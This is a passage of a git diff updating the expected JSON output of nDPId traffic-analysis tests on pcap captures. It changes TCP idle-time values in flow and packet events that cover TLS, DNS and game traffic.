+00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} +00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":21,"total-skipped-flows":0,"total-l4-data-len":4010,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1620643422754} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 21/21 diff --git a/test/results/starcraft_battle.pcap.out b/test/results/starcraft_battle.pcap.out index 0940ae948..66e288542 100644 --- a/test/results/starcraft_battle.pcap.out +++ b/test/results/starcraft_battle.pcap.out @@ -1,8 +1,8 @@ 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"starcraft_battle.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437389953643} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1437389953643,"pkt":"IImEa8W6hCYVPnXECABFAABHZtpAAPMGok\/AHvxbwKgBZAG7DI12Mx9qhBzaXVAYAB\/+XQAAFwMDABrSe+rfqh1HHm09zJFdvf5O5AwaBTHDWE16Zg=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437389953643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1437389953643,"pkt":"IImEa8W6hCYVPnXECABFAABHZtpAAPMGok\/AHvxbwKgBZAG7DI12Mx9qhBzaXVAYAB\/+XQAAFwMDABrSe+rfqh1HHm09zJFdvf5O5AwaBTHDWE16Zg=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437389953741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389953741,"pkt":"hCYVPnXEIImEa8W6CABFAABIX14AAIARVpTAqAFkwKgB\/uXCADUANEsbLmwBAAABAAAAAAAAAjkxAzI1MgIzMAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -10,9 +10,9 @@ 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437389953743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1437389953743,"pkt":"IImEa8W6hCYVPnXECABFAABcAABAAEARtd7AqAH+wKgBZAA15cIASF7P6I+BgAABAAEAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAAAAAAgGbmItd2luAA=="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437389954543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2AAAIARVpLAqAFkwKgB\/uXPADUANOzD5FkBAAABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -21,8 +21,8 @@ 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437389954544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954544,"pkt":"IImEa8W6hCYVPnXECABFAABIAABAAEARtfLAqAH+wKgBZAA15c8ANGxA5FmBgwABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955670,"flow_last_seen":1437389955670,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1437389955670,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1437389955670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1437389955670,"pkt":"IImEa8W6hCYVPnXECABFAABFcNYAADURfO2twigWwKgBZAG70UAAMRxxEMkFXwBmE17ybHuJOXq3nhBj9+0\/GMWhnexwnqL3\/n6xqnftvooLDz8="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1437389955696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1437389955696,"pkt":"hCYVPnXEIImEa8W6CABFAABFDD0AAIARlobAqAFkrcIoFtFAAbsAMXj5DBnPzxTN69maKsxX+B31W\/+0ERxkBS+pEu\/Lu7MhCuhfcS4mTXYS47w="} @@ -31,9 +31,9 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1437389955800,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1437389955800,"pkt":"IImEa8W6hCYVPnXECABFAABuAABAAEARtczAqAH+wKgBZAA15dwAWs2+izyBgAABAAEAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAC+XABoNODAtMjM5LTE4Ni00MAZhdHRlbnMDbmV0AA=="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 